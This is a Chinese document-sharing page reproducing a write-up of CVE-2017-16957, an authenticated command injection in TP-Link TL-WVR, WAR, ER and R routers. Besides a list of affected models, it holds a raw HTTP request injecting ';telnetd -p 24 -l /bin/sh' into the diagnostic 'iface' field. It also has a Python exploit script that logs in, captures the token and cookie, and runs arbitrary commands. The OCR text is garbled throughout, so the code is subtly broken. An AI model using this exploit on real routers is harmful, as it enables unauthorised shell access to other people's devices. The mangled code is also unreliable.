（CVE-2017-16957）TP-Link 命令注入漏洞.docx

《（CVE-2017-16957）TP-Link 命令注入漏洞.docx》由会员分享，可在线阅读，更多相关《（CVE-2017-16957）TP-Link 命令注入漏洞.docx（19页珍藏版）》请在第一文库网上搜索。

1、(CVE-2017-16957)TP1ink命令注入漏洞一、漏洞简介TP-1inkT1-WVR等都是中国普联(TP-1INK)公司的无线路由器产品。多款TP-1ink产品中存在命令注入漏洞。远程攻击者可通过向cgi-bin/1uci发送face字段中带有she11元字符的admin/diagnostic命令利用该漏洞执行任意命令。二、漏洞影响TP-1INKT1-WVRTP-1INKT1-WVR300v4TP-1INKT1-WVR302v2TP-1INKT1-WVR450TP-1INKT1-WVR4501TP-1INKT1-WVR450Gv5TP-1INKT1-WVR458TP-1INKT1-W

2、VR4581TP-1INKT1-WVR458PTP-1INKT1-WVR900Gv3TP-1INKT1-WVR12001TP-1INKT1-WVR9001TP-1INKT1-WVR13001TP-1INKT1-WVR1300GTP-1INKT1-WVR17501TP-1INKT1-WVR26001TP-1INKT1-WVR43001TP-1INKT1-WAR450TP-1INKT1-WAR302TP-1INKT1-WAR26001TP-1INKT1-WAR17501TP-1INKT1-WAR13001TP-1INKT1-WAR12001TP-1INKT1-WAR9001TP-1INKT1-WA

3、R458TP-1INKT1-WAR4501TP-1INKT1-ER5510Gv2TP-1INKT1-ER5510Gv3TP-1INKT1-ER5520Gv2TP-1INKT1-ER5520Gv3TP-1INKT1-ER6120Gv2TP-11NKT1-ER6520Gv2TP-1INKT1-ER6520Gv3TP-1INKT1-ER3210GTP-1INKT1-ER7520GTP-1INKT1-ER6520GTP-1INKT1-ER6510GTP-1INKT1-ER6220GTP-1INKT1-ER6120GTP-1INKT1-ER6110GTP-1INKT1-ER5120GTP-1INKT1-

4、ER5110GTP-1INKT1-ER3220GTP-1INKT1-R479P-ACTP-1INKT1-R478G+TP-1INKT1-R478GTP-1INKT1-R478+TP-1INKT1-R478TP-1INKT1-R473GP-ACTP-1INKT1-R473P-ACTP-1INKT1-R473GTP-1INKT1-R473TP-1INKT1-R4299GTP-1INKT1-R4239GTP-1INKT1-R4149GTP-1INKT1-R488TP-1INKT1-R483TP-1INKT1-R483GTP-1INKT1-R479GP-ACTP-11NKT1-R479GPE-AC三、

5、复现过程POSTcgi-bin/1uciJstok=ea2178b4514da7ae227f4ec192536930admindiagnostic?form=diagHTTP1.1Host:0-sec.orgContent-1ength:370Accept:app1icationjsonjtext/javascript,*/*;q=0.01Origin:http:/192.168.3.1X-Requested-With:XM1HttpRequestUser-Agent:Mozi11a/5.0(WindowsNT10.0;Win64;64)App1eWebKit/537.36(KHTM1,1ik

6、eGecko)Chrome/53.0.2785.116Safari/537.36Content-Type:app1ication/x-www-form-ur1encoded;charset=UTF-8Referer:http:/192.168.3.1/webpages/index.htm1Accept-Encoding:gzip,def1ateCookie:Sysauth=be9b6f2b4b9a76a8a658e108c6197f2cConnection:c1osedata=%7B%22method%22%3A%22start%22%2C%22params%22%3A%7B%22type%2

7、2%3A%220%22%2C%22type_hidden%22%3A%220%22%2C%22ipaddr_ping%22%3A%22%2C%22iface-ping%22%3A%22WAN1%22%2C%22ipaddr%22%3A%22%2C%22iface%22%3A%22%3Bte1netd+-p+24+-1+binsh%22%2C%22count%22%3A%221%22%2C%22pktsize%22%3A%2264%22%2C%22my-resu1t%22%3A%22The+Router+is+ready.%5Cr%5Cn%22%7D%7D漏洞脚本# Testedproduct:

8、T1-WVR4501# Hardwareversion：VI.0# Firmwareversion:20161125# TheRSA_Encryption_For_Tp1ink.jsisuseforRsaEncryptiontothepasswordwhen1oginthewebmanager.# Youcandown1oadtheRSA_Encryption_For_Tp1ink.jsbycoincoin7Wire1ess-Router-Vu1nerabi1ity/b1ob/master/RSA_Encryption_FOjTp1inkjsimportexecjsimportrequests

9、importjsonimportur11ibdefread_js():fi1e=open(,./RSA_Encryption_For_Tp1ink.js,r,)1ine=fi1e.read1ine()js=whi1e1ine:js=js+1ine1ine=fi1e.read1ine()fi1e.c1ose()returnjsdefeecute(ipjport,username,passwdjcmd):try:s=requests.session()uri=http：/：.format(ip,port)headers=Content-Type,:,app1ication/x-www-form-u

10、r1encoded;charset=UTF-8,Referer1:httprwebpages1ogin.htm1.format(ip)pay1oad=method:get,ret=s.post(uri+,cgi-bin1uci;Stok=Z1oginPform=Iogin,jdata=ur11ib.ur1encode(data:json.dumps(pay1oad),headers=headers,timeout=5)rsa_pub1ic_n=json.1oads(ret.text)resu1tpassword0.encodeCutf-S)rsa_pub1ic_e=json.1oads(ret

11、.text),resu1t,password,1.encode(utf-8)js=read_js()js_hand1e=pi1e(js)password=js_hand1e.ca11(MainEncrypt,rsa_pub1ic_n,rsa_pub1ic_e,passwd)pay1oadmethod:1ogin,params:username:,.format(username)jpassword:.format(password)ret=s.post(uri+,cgi-bin1uci;Stok=Z1oginPform=Iogin,data=r11ib.ur1encode(data:json.

12、dumps(pay1oad),headers=headersjtimeout=5)stok=json.1oads(ret.text)resu1t,stok,.encode(utf-8,)cookie=ret.headersSet-Cookie1print,+1oginsuccess,print,+GetTheToken:+stokprint,+GetTheCookie:,+cookieheaders=Content-Type,:app1ication/x-www-form-ur1encoded;charset=UTF-8,Referer:,httpzwebpages1ogin.htm1,.fo

13、rmat(ip)jCookie:,.format(cookie)pay1oad=method:start,params:typez0,type-hiddenz,0ipaddr_ping:127.0.0.1,iface-ping,r,WAN1,ipaddri,127.0.0.1,ifaceformat(cmd),“count：T,“pktsize”：“64”，,my-resu1ti,exp1oit)ret=s.post(uri+,cgi-bin1uci;stok=/admin/diagnostic?form=diag.format(stok),data=ur11ib.ur1encode(data

14、:json.dumps(pay1oad),headers=headers,timeout=5)#printret.textprint+FinishRCEprint,returnTrueexcept:returnFa1seif_name_=_main_:print,Tp1ink1UCIdiagnosticAuthenticatedRCEIprintexecute(,192.168.1.1,j80j,admin,iadmin,ite1netd-p24-1binsh,)RSA_Encryption_For_Tp1ink.js文件/Copyright(c)2005TomWU/A11RightsRese

15、rved./See1ICENSEnfordetai1s./BasicJavaScriptBN1ibrary-subsetusefu1forRSAencryption./Bitsperdigit/JavaScriptengineana1ysisvarBI_RC=newArray();varBI_RM=,0123456789abcdefghijR1mnopqrstuvwxyz;vardbits;varcanary=Oxdeadbeefcafe;varj_1m=(canary&Oxffffff)=0efcafe);varrng_psize=256;varrng_state;varrng_poo1;varrng_pptr;/Initia1izethepoo1withjunk